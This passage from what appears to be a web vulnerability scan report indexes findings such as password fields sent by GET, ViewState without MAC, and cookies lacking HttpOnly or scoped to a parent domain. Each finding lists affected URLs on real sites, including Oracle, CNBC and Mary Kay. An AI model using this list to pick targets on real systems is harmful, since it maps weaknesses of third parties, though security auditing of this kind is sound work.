9.7. https://deloitte.zettaneer.com/

9.8. https://dne.oracle.com/

9.9. https://docs.google.com/

9.10. https://education.oracle.com/

9.11. https://event.on24.com/

9.12. https://forms.netsuite.com/

9.13. https://forums.oracle.com/

9.14. https://login.cnbc.com/

9.15. https://login.oracle.com/

9.16. https://myprofile.oracle.com/

9.17. https://oracleus.wingateweb.com/

9.18. https://register.cnbc.com/

9.19. https://shop.oracle.com/

9.20. https://support.oracle.com/

9.21. https://www.atg.com/

9.22. https://www.cvs.com/

10. Password field submitted using GET method

11. ASP.NET ViewState without MAC enabled

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://convctr.overture.com/images/cc/cc.gif

12.3. http://pg.links.origin.channelintelligence.com/pages/wl.asp

12.4. http://pixel.everesttech.net/1688/i

12.5. http://ttwbs.channelintelligence.com/

12.6. http://a.tribalfusion.com/displayAd.js

12.7. http://a.tribalfusion.com/i.cid

12.8. http://a.tribalfusion.com/j.ad

12.9. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

12.10. http://a.tribalfusion.com/z/i.cid

12.11. http://ads.pointroll.com/PortalServe/

12.12. http://api.bizographics.com/v1/profile.redirect

12.13. http://b.scorecardresearch.com/b

12.14. http://c.statcounter.com/t.php

12.15. http://clk.fetchback.com/serve/fb/click

12.16. http://clk.fetchback.com/serve/fb/engmnt

12.17. https://cms.paypal.com/us/cgi-bin/

12.18. http://developers.facebook.com/plugins/

12.19. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi

12.20. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

12.21. http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif

12.22. http://imp.fetchback.com/serve/fb/adtag.js

12.23. http://imp.fetchback.com/serve/fb/imp

12.24. https://login.cnbc.com/cas/logout

12.25. http://m1215.ic-live.com/522/

12.26. http://m1460.ic-live.com/586/

12.27. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

12.28. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

12.29. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

12.30. http://optimized-by.rubiconproject.com/a/dk.html

12.31. http://optimized-by.rubiconproject.com/a/dk.js

12.32. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

12.33. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

12.34. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

12.35. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

12.36. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

12.37. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

12.38. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

12.39. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

12.40. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

12.41. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

12.42. http://p.brilig.com/contact/bct

12.43. http://pi.pardot.com/analytics

12.44. http://ping.crowdscience.com/ping.js

12.45. http://pixel.fetchback.com/serve/fb/pdc

12.46. http://pixel.quantserve.com/pixel

12.47. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif

12.48. http://r.openx.net/img

12.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.51. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.52. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.53. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.54. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.55. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.56. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.57. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.58. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.59. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.60. http://rt.legolas-media.com/lgrt

12.61. http://search.spotxchange.com/track/tag/6382.1008/img

12.62. http://server.iad.liveperson.net/hc/52793056/

12.63. http://services.krxd.net/geoip

12.64. http://services.krxd.net/pixel.gif

12.65. http://tags.bluekai.com/site/3834

12.66. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

12.67. http://www.bizographics.com/collect/

12.68. http://www.marykay.com/

12.69. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

12.70. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

12.71. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

12.72. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

12.73. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js

12.74. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf

12.75. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf

12.76. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf

12.77. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf

12.78. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf

12.79. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf

12.80. http://www.marykay.com/Content/HPflash/502_moc.swf

12.81. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf

12.82. http://www.marykay.com/IMAGES/bkgLong.gif

12.83. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png

12.84. http://www.marykay.com/Images/Site/FooterBack1.gif

12.85. http://www.marykay.com/Images/Site/hdottedline.gif

12.86. http://www.marykay.com/Images/Site/searchbox.gif

12.87. http://www.marykay.com/Images/Site/vdottedline.gif

12.88. http://www.marykay.com/Images/Site/wholeheader.jpg

12.89. http://www.marykay.com/JS/swfobject.js

12.90. http://www.marykay.com/Menu.css

12.91. http://www.marykay.com/Scripts/HeaderScript.js

12.92. http://www.marykay.com/Scripts/jquery-1.4.2.min.js

12.93. http://www.marykay.com/Styles.css

12.94. http://www.marykay.com/Styles_US.css

12.95. http://www.marykay.com/Themes/TabMenu/US/tabs.css

12.96. http://www.marykay.com/Themes/TabMenu/tabs.js

12.97. http://www.marykay.com/content/HPflash/portfolio_mk.xml

12.98. http://www.marykay.com/content/hpflash/stage.swf

12.99. http://www.marykay.com/default.aspx

12.100. http://www.marykay.com/favicon.ico

12.101. http://www.marykay.com/images/fflogo.jpg

12.102. http://www.marykay.com/images/icn_ec.jpg

12.103. http://www.marykay.com/images/icn_fb.jpg

12.104. http://www.marykay.com/images/icn_pbp.jpg

12.105. http://www.marykay.com/images/icn_vmo.jpg

12.106. http://www.marykay.com/images/icn_yt.jpg

12.107. http://www.marykay.com/images/ielogo.jpg

12.108. http://www.marykay.com/images/searchbutton.gif

12.109. http://www.marykay.com/scripts/i2a.js

13. Cookie without HttpOnly flag set

13.1. http://afe.specificclick.net/

13.2. http://afe.specificclick.net/serve/v=5

13.3. http://blog.harbottle.com/dm/xmlrpc.php

13.4. http://convctr.overture.com/images/cc/cc.gif

13.5. http://data.cnbc.com/quotes

13.6. https://forums.oracle.com/forums/adfAuthentication

13.7. https://forums.oracle.com/forums/category.jspa

13.8. https://forums.oracle.com/forums/guestsettings!default.jspa

13.9. https://forums.oracle.com/forums/index.jspa

13.10. https://forums.oracle.com/forums/login!withRedirect.jspa

13.11. https://forums.oracle.com/forums/main.jspa

13.12. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

13.13. http://pg.links.origin.channelintelligence.com/pages/wl.asp

13.14. http://pg.links.origin.channelintelligence.com/pages/wl.asp

13.15. http://pg.links.origin.channelintelligence.com/pages/wl.asp

13.16. http://pixel.adsafeprotected.com/jspix

13.17. http://pixel.everesttech.net/1688/i

13.18. https://register.cnbc.com/forgotPassword.do

13.19. https://register.cnbc.com/memberCenter.do

13.20. https://register.cnbc.com/registerUser.do

13.21. http://search.oracle.com/search/search

13.22. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

13.23. http://ttwbs.channelintelligence.com/

13.24. http://www.atg.com/svc-common/script/propertyFunc.js.jsp

13.25. http://a.tribalfusion.com/displayAd.js

13.26. http://a.tribalfusion.com/i.cid

13.27. http://a.tribalfusion.com/j.ad

13.28. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

13.29. http://a.tribalfusion.com/z/i.cid

13.30. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**

13.31. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**

13.32. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**

13.33. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**

13.34. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**

13.35. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**

13.36. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**

13.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

13.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

13.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

13.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

13.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

13.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

13.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

13.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

13.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

13.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

13.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**

13.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**

13.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**

13.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**

13.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**

13.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**

13.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**

13.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**

13.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**

13.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**

13.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**

13.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**

13.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**

13.63. http://ad.yieldmanager.com/pixel

13.64. http://ads.pointroll.com/PortalServe/

13.65. http://ads.rnmd.net/getAds

13.66. http://api.bizographics.com/v1/profile.redirect

13.67. http://api.twitter.com/1/statuses/user_timeline.json

13.68. http://b.scorecardresearch.com/b

13.69. http://c.statcounter.com/t.php

13.70. http://clk.fetchback.com/serve/fb/click

13.71. http://clk.fetchback.com/serve/fb/engmnt

13.72. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G

13.73. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL

13.74. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

13.75. http://d.ads.readwriteweb.com/ck.php

13.76. http://d.ads.readwriteweb.com/spc.php

13.77. http://d1.openx.org/ck.php

13.78. http://developers.facebook.com/plugins/

13.79. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi

13.80. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

13.81. http://imp.fetchback.com/serve/fb/adtag.js

13.82. http://imp.fetchback.com/serve/fb/imp

13.83. http://lct.salesforce.com/sfga.js

13.84. http://legolas.nexac.com/lgalt

13.85. https://login.cnbc.com/cas/logout

13.86. https://login.oracle.com/favicon.ico

13.87. https://login.oracle.com/mysso/signon.jsp

13.88. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

13.89. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

13.90. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

13.91. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

13.92. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

13.93. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

13.94. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

13.95. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

13.96. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

13.97. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

13.98. https://login.oracle.com/mysso/sso_loginui/loginStyling.css

13.99. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

13.100. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

13.101. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

13.102. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

13.103. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

13.104. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

13.105. https://login.oracle.com/mysso/sso_loginui/sso_check.js

13.106. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

13.107. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

13.108. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

13.109. https://login.oracle.com/oam/server/sso/auth_cred_submit

13.110. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

13.111. http://m1215.ic-live.com/522/

13.112. http://m1460.ic-live.com/586/

13.113. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

13.114. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

13.115. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

13.116. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

13.117. http://optimized-by.rubiconproject.com/a/dk.html

13.118. http://optimized-by.rubiconproject.com/a/dk.js

13.119. http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103

13.120. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

13.121. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

13.122. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

13.123. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

13.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

13.125. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

13.126. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

13.127. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

13.128. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

13.129. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

13.130. http://p.brilig.com/contact/bct

13.131. http://pi.pardot.com/analytics

13.132. http://ping.crowdscience.com/ping.js

13.133. http://pixel.fetchback.com/serve/fb/pdc

13.134. http://pixel.quantserve.com/pixel

13.135. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif

13.136. http://r.openx.net/img

13.137. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.138. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.139. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.140. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.141. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.142. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.143. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.144. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.145. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.146. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.147. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.148. http://register.cnbc.com/forgotPassword.do

13.149. http://register.cnbc.com/forgotpassword1.jsp

13.150. https://register.cnbc.com/

13.151. https://register.cnbc.com/RandomImage.jsp

13.152. https://register.cnbc.com/cas

13.153. https://register.cnbc.com/checkemail.do

13.154. https://register.cnbc.com/checkpassword.do

13.155. https://register.cnbc.com/checkscreenname.do

13.156. https://register.cnbc.com/checkzipcode.do

13.157. https://register.cnbc.com/createUser.do

13.158. https://register.cnbc.com/css/forgotPassword.css

13.159. https://register.cnbc.com/css/member_center_sytles.css

13.160. https://register.cnbc.com/css/newRegistration.css

13.161. https://register.cnbc.com/css/registration.css

13.162. https://register.cnbc.com/email/EmailSupport.jsp

13.163. https://register.cnbc.com/favicon.ico

13.164. https://register.cnbc.com/forgotPassword1.do

13.165. https://register.cnbc.com/forgotpassword1.jsp

13.166. https://register.cnbc.com/images/clickToContinue.gif

13.167. https://register.cnbc.com/images/loaderImage.gif

13.168. https://register.cnbc.com/images/memberCenterHeader.jpg

13.169. https://register.cnbc.com/images/submitPreferences.jpg

13.170. https://register.cnbc.com/images/tick.jpg

13.171. https://register.cnbc.com/images/tile_02.gif

13.172. https://register.cnbc.com/images/wrong.jpg

13.173. https://register.cnbc.com/js/membercenter.js

13.174. https://register.cnbc.com/js/prototype_ajax.js

13.175. https://register.cnbc.com/js/registrationBasic.js

13.176. https://register.cnbc.com/js/registrationUtils.js

13.177. https://register.cnbc.com/js/registrationValidations.js

13.178. https://register.cnbc.com/js/s_code.js

13.179. https://register.cnbc.com/js/validation.js

13.180. https://register.cnbc.com/quote-html-webservice/fvquote.htm

13.181. https://register.cnbc.com/quote-html-webservice/quote.htm

13.182. https://register.cnbc.com/refreshlogin.jsp

13.183. http://rt.legolas-media.com/lgrt

13.184. http://search.spotxchange.com/track/tag/6382.1008/img

13.185. http://server.iad.liveperson.net/hc/52793056/

13.186. http://services.krxd.net/geoip

13.187. http://services.krxd.net/pixel.gif

13.188. http://sophelle.app5.hubspot.com/salog.js.aspx

13.189. http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif

13.190. http://t2.trackalyzer.com/trackalyze.asp

13.191. http://t5.trackalyzer.com/trackalyze.asp

13.192. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

13.193. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

13.194. http://tags.bluekai.com/site/3834

13.195. http://tenzing.fmpub.net/

13.196. http://ticker.cnbc.com/

13.197. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

13.198. http://www.bizographics.com/collect/

13.199. http://www.cnbc.com/

13.200. http://www.cnbc.com/id/15837856

13.201. http://www.cnbc.com/id/15837856/site/14081545/

13.202. http://www.cnbc.com/id/15838394

13.203. http://www.cnbc.com/id/15839263/

13.204. http://www.cnbc.com/pointrollads.htm

13.205. http://www.csc.com/cybersecurity/contact_us

13.206. http://www.csc.com/search

13.207. http://www.csc.com/services

13.208. http://www.csc.com/utils/live_search

13.209. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

13.210. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp

13.211. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

13.212. http://www.gillettevenus.com/en_US/razor_finder/index.jsp

13.213. http://www.gillettevenus.com/en_US/search/index.jsp

13.214. http://www.googleadservices.com/pagead/aclk

13.215. http://www.marykay.com/

13.216. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

13.217. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

13.218. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

13.219. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

13.220. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js

13.221. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf

13.222. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf

13.223. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf

13.224. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf

13.225. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf

13.226. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf

13.227. http://www.marykay.com/Content/HPflash/502_moc.swf

13.228. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf

13.229. http://www.marykay.com/IMAGES/bkgLong.gif

13.230. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png

13.231. http://www.marykay.com/Images/Site/FooterBack1.gif

13.232. http://www.marykay.com/Images/Site/hdottedline.gif

13.233. http://www.marykay.com/Images/Site/searchbox.gif

13.234. http://www.marykay.com/Images/Site/vdottedline.gif

13.235. http://www.marykay.com/Images/Site/wholeheader.jpg

13.236. http://www.marykay.com/JS/swfobject.js

13.237. http://www.marykay.com/Menu.css

13.238. http://www.marykay.com/Scripts/HeaderScript.js

13.239. http://www.marykay.com/Scripts/jquery-1.4.2.min.js

13.240. http://www.marykay.com/Styles.css

13.241. http://www.marykay.com/Styles_US.css

13.242. http://www.marykay.com/Themes/TabMenu/US/tabs.css

13.243. http://www.marykay.com/Themes/TabMenu/tabs.js

13.244. http://www.marykay.com/content/HPflash/portfolio_mk.xml

13.245. http://www.marykay.com/content/hpflash/stage.swf

13.246. http://www.marykay.com/default.aspx

13.247. http://www.marykay.com/favicon.ico

13.248. http://www.marykay.com/images/fflogo.jpg

13.249. http://www.marykay.com/images/icn_ec.jpg

13.250. http://www.marykay.com/images/icn_fb.jpg

